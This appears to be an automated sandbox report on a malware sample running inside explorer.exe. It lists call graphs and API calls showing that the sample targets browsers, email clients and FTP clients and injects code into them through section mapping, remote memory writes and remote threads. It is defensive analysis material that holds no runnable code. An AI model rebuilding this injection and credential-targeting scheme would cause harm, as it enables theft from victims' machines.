c22861 GetProcessHeap RtlAllocateHeap 763->764 764->717 827 c22861 GetProcessHeap RtlAllocateHeap 765->827 767 c210cc 768 c210dc CreateToolhelp32Snapshot 767->768 769 c21322 Sleep 768->769 770 c210f0 Process32First 768->770 769->768 771 c2131b CloseHandle 770->771 772 c2110c lstrcmpiA 770->772 771->769 773 c21280 772->773 774 c21124 lstrcmpiA 772->774 779 c21305 Process32Next 773->779 788 c22608 VirtualQuery 773->788 791 c212ae lstrcmpiA 773->791 828 c225ad OpenProcess 773->828 834 c21819 773->834 774->773 775 c21138 lstrcmpiA 774->775 775->773 777 c2114c lstrcmpiA 775->777 777->773 778 c21160 lstrcmpiA 777->778 778->773 780 c21170 lstrcmpiA 778->780 779->772 781 c21319 779->781 780->773 782 c21184 lstrcmpiA 780->782 781->771 782->773 783 c21198 lstrcmpiA 782->783 783->773 784 c211ac lstrcmpiA 783->784 784->773 785 c211c0 lstrcmpiA 784->785 785->773 786 c211d4 lstrcmpiA 785->786 786->773 787 c211e8 lstrcmpiA 786->787 787->773 789 c211fc lstrcmpiA 787->789 788->773 789->773 790 c2120c lstrcmpiA 789->790 790->773 792 c2121c lstrcmpiA 790->792 791->773 792->773 793 c2122c lstrcmpiA 792->793 793->773 794 c2123c lstrcmpiA 793->794 794->773 796 c2124c lstrcmpiA 794->796 796->773 797 c2125c lstrcmpiA 796->797 797->773 798 c2126c lstrcmpiA 797->798 798->773 798->779 799->721 880 c22861 GetProcessHeap RtlAllocateHeap 800->880 802 c21340 GetModuleFileNameA 881 c22861 GetProcessHeap RtlAllocateHeap 802->881 804 c21357 GetCurrentProcessId wsprintfA 882 c2263e CryptAcquireContextA 804->882 807 c2139c Sleep 887 c224d5 GetCurrentProcessId GetCurrentThreadId CreateToolhelp32Snapshot Thread32First 807->887 808 c2140d 905 c22843 808->905 812 c213ae GetModuleHandleA GetProcAddress 814 c213da GetModuleHandleA GetProcAddress 812->814 815 c213c9 812->815 813 c22843 3 API calls 818 c2141b RtlExitUserThread 813->818 816 c21406 814->816 817 c213f5 814->817 895 c21de3 815->895 821 c224d5 10 API calls 816->821 820 c21de3 3 API calls 817->820 822 c21425 818->822 820->816 821->808 823 c2144b 822->823 824 c22608 VirtualQuery 822->824 823->724 825 c2143a 824->825 825->823 910 c21493 825->910 827->767 829 c22600 828->829 830 c225cb IsWow64Process 828->830 829->773 831 c225dc IsWow64Process 830->831 833 c225ee 830->833 832 c225f9 CloseHandle 831->832 831->833 832->829 833->832 835 c22608 VirtualQuery 834->835 836 c21833 835->836 837 c21845 OpenProcess 836->837 838 c21a76 836->838 837->838 839 c2185e 837->839 838->773 840 c22608 VirtualQuery 839->840 841 c21865 840->841 841->838 842 c21873 NtSetInformationProcess 841->842 843 c2188f 841->843 842->843 865 c21a80 843->865 846 c21a80 2 API calls 847 c218d6 846->847 848 c21a73 CloseHandle 847->848 849 c21a80 2 API calls 847->849 848->838 850 c21900 849->850 871 c21b17 850->871 853 c21a80 2 API calls 854 c21930 RtlMoveMemory RtlMoveMemory NtUnmapViewOfSection 853->854 855 c21985 854->855 856 c21a4e CreateRemoteThread 854->856 858 c2198b CreateMutexA GetLastError 855->858 861 c219bb GetModuleHandleA GetProcAddress ReadProcessMemory 855->861 857 c21a65 CloseHandle 856->857 859 c21a67 CloseHandle CloseHandle 857->859 858->855 860 c219a7 CloseHandle Sleep 858->860 859->848 860->858 862 c21a47 861->862 863 c219ec WriteProcessMemory 861->863 862->857 862->859 863->862 864 c21a16 CreateRemoteThread CloseHandle Sleep WriteProcessMemory 863->864 864->862 866 c21a94 865->866 870 c218b4 865->870 867 c21aa4 NtCreateSection 866->867 868 c21ac3 866->868 867->868 869 c21ad8 NtMapViewOfSection 868->869 868->870 869->870 870->846 872 c21b60 871->872 873 c21b2e 871->873 876 c21b71 LoadLibraryA 872->876 878 c21bc3 872->878 879 c21ba1 GetProcAddress 872->879 874 c21b30 RtlMoveMemory 873->874 874->872 874->874 875 c21910 NtUnmapViewOfSection 875->853 876->872 876->875 877 c21be1 LdrProcessRelocationBlock 877->875 877->878 878->875 878->877 879->872 879->875 880->802 881->804 883 c22664 CryptCreateHash lstrlen CryptHashData CryptGetHashParam 882->883 884 c21384 CreateMutexA GetLastError 882->884 885 c226aa wsprintfA 883->885 884->807 884->808 885->885 886 c226cc CryptDestroyHash CryptReleaseContext 885->886 886->884 888 c22515 887->888 889 c22565 CloseHandle 888->889 890 c22555 Thread32Next 888->890 891 c22521 OpenThread 888->891 889->812 890->888 892 c22544 ResumeThread 891->892 893 c2253c SuspendThread 891->893 894 c2254a CloseHandle 892->894 893->894 894->890 896 c21e56 895->896 897 c21ded 895->897 896->814 897->896 937 c21e93 VirtualProtect 897->937 899 c21e04 899->896 938 c22815 VirtualAlloc 899->938 901 c21e10 902 c21e1a RtlMoveMemory 901->902 903 c21e2d 901->903 902->903 939 c21e93 VirtualProtect 903->939 906 c22608 VirtualQuery 905->906 907 c2284b 906->907 908 c21414 907->908 909 c2284f GetProcessHeap HeapFree 907->909 908->813 909->908 911 c214c0 910->911 912 c214a1 910->912 913 c21510 911->913 914 c214c8 911->914 940 c217c7 912->940 959 c226e6 lstrlen lstrlen 913->959 917 c217c7 5 API calls 914->917 934 c214b6 914->934 919 c214e0 917->919 919->934 947 c21647 919->947 920 c2155f 921 c226e6 2 API calls 920->921 923 c2156c 921->923 927 c215a0 923->927 928 c21584 923->928 923->934 924 c21532 961 c21752 GetModuleHandleA GetProcAddress 924->961 930 c22404 5 API calls 927->930 927->934 964 c22404 lstrlen 928->964 933 c215ac 930->933 931 c21647 11 API calls 931->934 933->934 935 c21647 11 API calls 933->935 934->823 936 c214fb 935->936 936->934 970 c215e0 936->970 937->899 938->901 939->896 941 c217d1 940->941 942 c21812 940->942 941->942 943 c226e6 2 API calls 941->943 942->934 944 c217f1 943->944 944->942 975 c22861 GetProcessHeap RtlAllocateHeap 944->975 946 c21804 RtlMoveMemory 946->942 948 c21660 947->948 958 c21745 947->958 949 c21671 lstrlen 948->949 948->958 950 c21683 lstrlen 949->950 949->958 951 c21690 getpeername 950->951 950->958 952 c216ae inet_ntoa htons 951->952 951->958 953 c216cc 952->953 952->958 953->958 976 c22861 GetProcessHeap RtlAllocateHeap 953->976 955 c21717 wsprintfA 956 c2173a 955->956 957 c22843 3 API calls 956->957 956->958 957->958 958->936 960 c2151d 959->960 960->920 960->924 962 c21539 961->962 963 c21776 RtlZeroMemory RtlZeroMemory RtlZeroMemory RtlZeroMemory 961->963 962->931 962->934 963->962 965 c22456 964->965 966 c2241c CryptStringToBinaryA 964->966 965->934 966->965 967 c22438 966->967 977 c22861 GetProcessHeap RtlAllocateHeap 967->977 969 c22444 CryptStringToBinaryA 969->965 971 c22843 3 API calls 970->971 972 c215f5 971->972 973 c22843 3 API calls 972->973 974 c215fc 973->974 974->934 975->946 976->955 977->969 987 c22806 VirtualFree 988 c21eb6 989 c21ed9 988->989 990 c21ecc lstrlen 988->990 999 c22861 GetProcessHeap RtlAllocateHeap 989->999 990->989 992 c21ee1 lstrcat 993 c21f16 lstrcat 992->993 994 c21f1d 992->994 993->994 1000 c21f4a 994->1000 997 c22843 3 API calls 998 c21f40 997->998 999->992 1034 c222b8 1000->1034 1004 c21f77 1039 c227e2 lstrlen MultiByteToWideChar 1004->1039 1006 c21f86 1040 c22374 RtlZeroMemory 1006->1040 1009 c21fd8 RtlZeroMemory 1011 c2200d 1009->1011 1010 c22843 3 API calls 1012 c21f2d 1010->1012 1014 c2203b 1011->1014 1015 c2229a 1011->1015 1042 c222e5 1011->1042 1012->997 1017 c22280 1014->1017 1051 c22861 GetProcessHeap RtlAllocateHeap 1014->1051 1015->1010 1016 c22843 3 API calls 1016->1015 1017->1015 1017->1016 1019 c2210b wsprintfW 1020 c22131 1019->1020 1024 c2219e 1020->1024 1052 c22861 GetProcessHeap RtlAllocateHeap 1020->1052 1022 c2216b wsprintfW 1022->1024 1023 c2225d 1025 c22843 3 API calls 1023->1025 1024->1023 1053 c22861 GetProcessHeap RtlAllocateHeap 1024->1053 1027 c22271 1025->1027 1027->1017 1028 c22843 3 API calls 1027->1028 1028->1017 1029 c22256 1032 c22843 3 API calls 1029->1032 1030 c221e9 1030->1029 1054 c22815 VirtualAlloc 1030->1054 1032->1023 1033 c22243 RtlMoveMemory 1033->1029 1035 c222c2 1034->1035 1036 c21f69 1034->1036 1037 c226e6 2 API calls 1035->1037 1038 c22861 GetProcessHeap RtlAllocateHeap 1036->1038 1037->1036 1038->1004 1039->1006 1041 c21f96 1040->1041 1041->1009 1041->1015 1044 c222f2 1042->1044 1045 c22353 1042->1045 1043 c222f6 DnsQuery_W 1043->1044 1044->1043 1044->1045 1046 c22335 DnsFree inet_ntoa 1044->1046 1045->1014 1046->1044 1047 c22355 1046->1047 1055 c22861 GetProcessHeap RtlAllocateHeap 1047->1055 1049 c2235f 1056 c227e2 lstrlen MultiByteToWideChar 1049->1056 1051->1019 1052->1022 1053->1030 1054->1033 1055->1049 1056->1045 1057 c21425 1058 c21432 1057->1058 1059 c2144b 1057->1059 1060 c22608 VirtualQuery 1058->1060 1061 c2143a 1060->1061 1061->1059 1062 c21493 23 API calls 1061->1062 1062->1059 978 c27728 979 c27904 978->979 980 c2774b 978->980 979->979 981 c2785a LoadLibraryA 980->981 984 c2789f VirtualProtect VirtualProtect 980->984 982 c27871 981->982 982->980 985 c27883 GetProcAddress 982->985 984->979 985->982 986 c27899 985->986 1069 c2245e lstrlen 1070 c22476 CryptBinaryToStringA 1069->1070 1071 c224a5 1069->1071 1070->1071 1072 c22489 1070->1072 1075 c22861 GetProcessHeap RtlAllocateHeap 1072->1075 1074 c22494 CryptBinaryToStringA 1074->1071 1075->1074

                                                                                                                                                                Callgraph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                • Opacity -> Relevance
                                                                                                                                                                • Disassembly available
                                                                                                                                                                callgraph 0 Function_00C22843 10 Function_00C22608 0->10 1 Function_00C21A80 2 Function_00C21DC0 21 Function_00C21C19 2->21 3 Function_00C21D80 3->21 4 Function_00C21000 15 Function_00C21016 4->15 5 Function_00C22806 6 Function_00C21647 6->0 27 Function_00C22861 6->27 34 Function_00C224AE 6->34 7 Function_00C217C7 7->27 28 Function_00C226E6 7->28 8 Function_00C22404 8->27 9 Function_00C21F4A 9->0 19 Function_00C22815 9->19 24 Function_00C227E2 9->24 9->27 31 Function_00C222E5 9->31 38 Function_00C22731 9->38 40 Function_00C22374 9->40 41 Function_00C222B8 9->41 11 Function_00C22592 12 Function_00C21752 13 Function_00C21493 13->6 13->7 13->8 13->12 26 Function_00C215E0 13->26 13->28 14 Function_00C21E93 15->10 15->11 20 Function_00C21819 15->20 15->27 29 Function_00C210A4 15->29 35 Function_00C225AD 15->35 36 Function_00C21332 15->36 37 Function_00C22573 15->37 15->38 16 Function_00C21B17 17 Function_00C23417 18 Function_00C224D5 20->1 20->10 20->16 22 Function_00C2245E 22->27 23 Function_00C21E5D 23->3 25 Function_00C21DE3 25->2 25->14 25->19 25->23 26->0 29->10 29->11 29->20 29->27 29->35 29->37 29->38 30 Function_00C21425 30->10 30->13 31->24 31->27 32 Function_00C27728 33 Function_00C21469 33->10 33->13 36->0 36->10 36->13 36->18 36->25 36->27 42 Function_00C2263E 36->42 39 Function_00C21EB6 39->0 39->9 39->27 41->28 43 Function_00C2283F

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 0 c21016-c21020 call c22608 3 c21022-c2104b call c22861 RtlMoveMemory 0->3 4 c21097-c21098 0->4 7 c21071-c21090 GetCurrentProcessId 3->7 8 c2104d-c2106b call c22861 RtlMoveMemory 3->8 12 c21092-c21093 7->12 13 c2109e-c210d7 call c210a4 call c22861 7->13 8->7 12->4 15 c21095-c21099 call c21332 12->15 22 c210dc-c210ea CreateToolhelp32Snapshot 13->22 15->13 23 c21322-c2132d Sleep 22->23 24 c210f0-c21106 Process32First 22->24 23->22 25 c2131b-c2131c CloseHandle 24->25 26 c2110c-c2111e lstrcmpiA 24->26 25->23 27 c21280-c21289 call c225ad 26->27 28 c21124-c21132 lstrcmpiA 26->28 34 c21305-c21313 Process32Next 27->34 35 c2128b-c21294 call c22592 27->35 28->27 29 c21138-c21146 lstrcmpiA 28->29 29->27 31 c2114c-c2115a lstrcmpiA 29->31 31->27 33 c21160-c2116a lstrcmpiA 31->33 33->27 36 c21170-c2117e lstrcmpiA 33->36 34->26 37 c21319 34->37 35->34 41 c21296-c2129d call c22573 35->41 36->27 40 c21184-c21192 lstrcmpiA 36->40 37->25 40->27 42 c21198-c211a6 lstrcmpiA 40->42 41->34 48 c2129f-c212ac call c22608 41->48 42->27 44 c211ac-c211ba lstrcmpiA 42->44 44->27 45 c211c0-c211ce lstrcmpiA 44->45 45->27 47 c211d4-c211e2 lstrcmpiA 45->47 47->27 49 c211e8-c211f6 lstrcmpiA 47->49 48->34 54 c212ae-c21300 lstrcmpiA call c22731 call c21819 call c22731 48->54 49->27 51 c211fc-c2120a lstrcmpiA 49->51 51->27 53 c2120c-c2121a lstrcmpiA 51->53 53->27 55 c2121c-c2122a lstrcmpiA 53->55 54->34 55->27 57 c2122c-c2123a lstrcmpiA 55->57 57->27 59 c2123c-c2124a lstrcmpiA 57->59 59->27 61 c2124c-c2125a lstrcmpiA 59->61 61->27 63 c2125c-c2126a lstrcmpiA 61->63 63->27 65 c2126c-c2127a lstrcmpiA 63->65 65->27 65->34
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00C22608: VirtualQuery.KERNEL32(00C24434,?,0000001C), ref: 00C22615
                                                                                                                                                                  • Part of subcall function 00C22861: GetProcessHeap.KERNEL32(00000008,0000A000,00C210CC), ref: 00C22864
                                                                                                                                                                  • Part of subcall function 00C22861: RtlAllocateHeap.NTDLL(00000000), ref: 00C2286B
                                                                                                                                                                • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 00C21038
                                                                                                                                                                • RtlMoveMemory.NTDLL(00000000,?,?), ref: 00C2106B
                                                                                                                                                                • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 00C21074
                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,00C21010), ref: 00C2107A
                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00C210DF
                                                                                                                                                                • Process32First.KERNEL32(00000000,?), ref: 00C210FE
                                                                                                                                                                • lstrcmpiA.KERNEL32(?,firefox.exe), ref: 00C2111A
                                                                                                                                                                • lstrcmpiA.KERNEL32(?,iexplore.exe), ref: 00C2112E
                                                                                                                                                                • lstrcmpiA.KERNEL32(?,chrome.exe), ref: 00C21142
                                                                                                                                                                • lstrcmpiA.KERNEL32(?,opera.exe), ref: 00C21156
                                                                                                                                                                • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 00C21166
                                                                                                                                                                • lstrcmpiA.KERNEL32(?,outlook.exe), ref: 00C2117A
                                                                                                                                                                • lstrcmpiA.KERNEL32(?,thebat.exe), ref: 00C2118E
                                                                                                                                                                • lstrcmpiA.KERNEL32(?,thebat32.exe), ref: 00C211A2
                                                                                                                                                                • lstrcmpiA.KERNEL32(?,thebat64.exe), ref: 00C211B6
                                                                                                                                                                • lstrcmpiA.KERNEL32(?,thunderbird.exe), ref: 00C211CA
                                                                                                                                                                • lstrcmpiA.KERNEL32(?,filezilla.exe), ref: 00C211DE
                                                                                                                                                                • lstrcmpiA.KERNEL32(?,smartftp.exe), ref: 00C211F2
                                                                                                                                                                • lstrcmpiA.KERNEL32(?,winscp.exe), ref: 00C21206
                                                                                                                                                                • lstrcmpiA.KERNEL32(?,flashfxp.exe), ref: 00C21216
                                                                                                                                                                • lstrcmpiA.KERNEL32(?,cuteftppro.exe), ref: 00C21226
                                                                                                                                                                • lstrcmpiA.KERNEL32(?,mailmaster.exe), ref: 00C21236
                                                                                                                                                                • lstrcmpiA.KERNEL32(?,263em.exe), ref: 00C21246
                                                                                                                                                                • lstrcmpiA.KERNEL32(?,foxmail.exe), ref: 00C21256
                                                                                                                                                                • lstrcmpiA.KERNEL32(?,alimail.exe), ref: 00C21266
                                                                                                                                                                • lstrcmpiA.KERNEL32(?,mailchat.exe), ref: 00C21276
                                                                                                                                                                • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 00C212B4
                                                                                                                                                                • Process32Next.KERNEL32(00000000,00000128), ref: 00C2130B
                                                                                                                                                                • CloseHandle.KERNELBASE(00000000), ref: 00C2131C
                                                                                                                                                                • Sleep.KERNELBASE(000003E8), ref: 00C21327
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000E.00000002.3873767397.0000000000C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C21000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_14_2_c21000_explorer.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrcmpi$HeapMemoryMoveProcessProcess32$AllocateCloseCreateCurrentFirstHandleNextQuerySectionSleepSnapshotToolhelp32UnmapViewVirtual
                                                                                                                                                                • String ID: 0-FwP,Fw$263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
                                                                                                                                                                • API String ID: 2555639992-2259378096
                                                                                                                                                                • Opcode ID: 860c82d3524362fdab809434e154b159a6ca39d89bda2eef6c0e765ee22919db
                                                                                                                                                                • Instruction ID: 29079792f85c6b11f144cd8d9455a0c58d5a4bd7052e642b386c80f5c1a84716
                                                                                                                                                                • Opcode Fuzzy Hash: 860c82d3524362fdab809434e154b159a6ca39d89bda2eef6c0e765ee22919db
                                                                                                                                                                • Instruction Fuzzy Hash: 2C719271604365EBCB14EBB1BC45F6E7BACAF55780B080929FD50C28A1DF39DB068A74

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00C22861: GetProcessHeap.KERNEL32(00000008,0000A000,00C210CC), ref: 00C22864
                                                                                                                                                                  • Part of subcall function 00C22861: RtlAllocateHeap.NTDLL(00000000), ref: 00C2286B
                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00C210DF
                                                                                                                                                                • Process32First.KERNEL32(00000000,?), ref: 00C210FE
                                                                                                                                                                • lstrcmpiA.KERNEL32(?,firefox.exe), ref: 00C2111A
                                                                                                                                                                • lstrcmpiA.KERNEL32(?,iexplore.exe), ref: 00C2112E
                                                                                                                                                                • lstrcmpiA.KERNEL32(?,chrome.exe), ref: 00C21142
                                                                                                                                                                • lstrcmpiA.KERNEL32(?,opera.exe), ref: 00C21156
                                                                                                                                                                • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 00C21166
                                                                                                                                                                • lstrcmpiA.KERNEL32(?,outlook.exe), ref: 00C2117A
                                                                                                                                                                • lstrcmpiA.KERNEL32(?,thebat.exe), ref: 00C2118E
                                                                                                                                                                • lstrcmpiA.KERNEL32(?,thebat32.exe), ref: 00C211A2
                                                                                                                                                                • lstrcmpiA.KERNEL32(?,thebat64.exe), ref: 00C211B6
                                                                                                                                                                • lstrcmpiA.KERNEL32(?,thunderbird.exe), ref: 00C211CA
                                                                                                                                                                • lstrcmpiA.KERNEL32(?,filezilla.exe), ref: 00C211DE
                                                                                                                                                                • lstrcmpiA.KERNEL32(?,smartftp.exe), ref: 00C211F2
                                                                                                                                                                • lstrcmpiA.KERNEL32(?,winscp.exe), ref: 00C21206
                                                                                                                                                                • lstrcmpiA.KERNEL32(?,flashfxp.exe), ref: 00C21216
                                                                                                                                                                • lstrcmpiA.KERNEL32(?,cuteftppro.exe), ref: 00C21226
                                                                                                                                                                • lstrcmpiA.KERNEL32(?,mailmaster.exe), ref: 00C21236
                                                                                                                                                                • lstrcmpiA.KERNEL32(?,263em.exe), ref: 00C21246
                                                                                                                                                                • lstrcmpiA.KERNEL32(?,foxmail.exe), ref: 00C21256
                                                                                                                                                                • lstrcmpiA.KERNEL32(?,alimail.exe), ref: 00C21266
                                                                                                                                                                • lstrcmpiA.KERNEL32(?,mailchat.exe), ref: 00C21276
                                                                                                                                                                • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 00C212B4
                                                                                                                                                                • Process32Next.KERNEL32(00000000,00000128), ref: 00C2130B
                                                                                                                                                                • CloseHandle.KERNELBASE(00000000), ref: 00C2131C
                                                                                                                                                                • Sleep.KERNELBASE(000003E8), ref: 00C21327
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000E.00000002.3873767397.0000000000C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C21000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_14_2_c21000_explorer.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrcmpi$HeapProcess32$AllocateCloseCreateFirstHandleNextProcessSleepSnapshotToolhelp32
                                                                                                                                                                • String ID: 263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
                                                                                                                                                                • API String ID: 3950187957-1680033604
                                                                                                                                                                • Opcode ID: 0e21fba6563e14673dc3ddf13fe19e2d35e325a97b143a6a81f21f60bdd61dfa
                                                                                                                                                                • Instruction ID: 64028a6a02217ffd82325364acc2583e0b92c1208574e4af34b684dfe4affa98
                                                                                                                                                                • Opcode Fuzzy Hash: 0e21fba6563e14673dc3ddf13fe19e2d35e325a97b143a6a81f21f60bdd61dfa
                                                                                                                                                                • Instruction Fuzzy Hash: 31518471604365E7CB10DBB1AC45F6E7AEC6F55780B480939FD50C2890EF78DB068A75

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 113 c27728-c27745 114 c2774b-c27758 113->114 115 c2790d 113->115 116 c2776a-c2776f 114->116 115->115 117 c27771 116->117 118 c27773 117->118 119 c27760-c27765 117->119 121 c27778-c2777a 118->121 120 c27766-c27768 119->120 120->116 120->117 122 c27783-c27787 121->122 123 c2777c-c27781 121->123 122->121 124 c27789 122->124 123->122 125 c27794-c27799 124->125 126 c2778b-c27792 124->126 127 c2779b-c277a4 125->127 128 c277a8-c277aa 125->128 126->121 126->125 129 c277a6 127->129 130 c2781a-c2781d 127->130 131 c277b3-c277b7 128->131 132 c277ac-c277b1 128->132 129->128 133 c27822-c27825 130->133 134 c277c0-c277c2 131->134 135 c277b9-c277be 131->135 132->131 136 c27827-c27829 133->136 137 c277e4-c277f3 134->137 138 c277c4 134->138 135->134 136->133 141 c2782b-c2782e 136->141 139 c27804-c27811 137->139 140 c277f5-c277fc 137->140 142 c277c5-c277c7 138->142 139->139 144 c27813-c27815 139->144 140->140 143 c277fe 140->143 141->133 145 c27830-c2784c 141->145 146 c277d0-c277d4 142->146 147 c277c9-c277ce 142->147 143->120 144->120 145->136 148 c2784e 145->148 146->142 149 c277d6 146->149 147->146 150 c27854-c27858 148->150 151 c277e1 149->151 152 c277d8-c277df 149->152 153 c2785a-c27870 LoadLibraryA 150->153 154 c2789f-c278a2 150->154 151->137 152->142 152->151 156 c27871-c27876 153->156 155 c278a5-c278ac 154->155 157 c278d0-c27900 VirtualProtect * 2 155->157 158 c278ae-c278b0 155->158 156->150 159 c27878-c2787a 156->159 162 c27904-c27908 157->162 160 c278b2-c278c1 158->160 161 c278c3-c278ce 158->161 163 c27883-c27890 GetProcAddress 159->163 164 c2787c-c27882 159->164 160->155 161->160 162->162 167 c2790a 162->167 165 c27892-c27897 163->165 166 c27899-c2789c 163->166 164->163 165->156 167->115
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000E.00000002.3873767397.0000000000C26000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C26000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_14_2_c26000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: cbdf56ac10bb8d2bfee7787c7b275714d5afce688ae6a4646722d8308be4eb92
                                                                                                                                                                • Instruction ID: 2352527da8bcd7b69a8eee74440a900194c499003874738b7a8ab3c838787a6c
                                                                                                                                                                • Opcode Fuzzy Hash: cbdf56ac10bb8d2bfee7787c7b275714d5afce688ae6a4646722d8308be4eb92
                                                                                                                                                                • Instruction Fuzzy Hash: 1651387190C3A24FD7228A78ECC46B17BA0DB42720B290779C4F5CBBC6E7985D06C7A0

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 168 c22861-c22871 GetProcessHeap RtlAllocateHeap
                                                                                                                                                                APIs
                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,0000A000,00C210CC), ref: 00C22864
                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C2286B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000E.00000002.3873767397.0000000000C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C21000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_14_2_c21000_explorer.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Heap$AllocateProcess
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1357844191-0
                                                                                                                                                                • Opcode ID: 1994bb3dfae29d39ff30acffc74877060f0bb865adadc87a8d885bd794abe214
                                                                                                                                                                • Instruction ID: a8172761295de82db33063f936ee60eac7c46721d92524b76be6dfb88815d38f
                                                                                                                                                                • Opcode Fuzzy Hash: 1994bb3dfae29d39ff30acffc74877060f0bb865adadc87a8d885bd794abe214
                                                                                                                                                                • Instruction Fuzzy Hash: 3FA012704201807FDD5017A0AC0DF0D3A19A740301F0000007209C44608978014D8735

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00C22608: VirtualQuery.KERNEL32(00C24434,?,0000001C), ref: 00C22615
                                                                                                                                                                • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,7556E800,microsoftedgecp.exe,?), ref: 00C2184E
                                                                                                                                                                • NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 00C21889
                                                                                                                                                                • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 00C21919
                                                                                                                                                                • RtlMoveMemory.NTDLL(00000000,00C23428,00000016), ref: 00C21940
                                                                                                                                                                • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 00C21968
                                                                                                                                                                • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 00C21978
                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00C21992
                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 00C2199A
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00C219A8
                                                                                                                                                                • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00C219AF
                                                                                                                                                                • GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00C219C5
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00C219CC
                                                                                                                                                                • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00C219E2
                                                                                                                                                                • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00C21A0C
                                                                                                                                                                • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C21A1F
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00C21A26
                                                                                                                                                                • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00C21A2D
                                                                                                                                                                • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00C21A41
                                                                                                                                                                • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00C21A58
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00C21A65
                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00C21A6B
                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00C21A71
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00C21A74
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
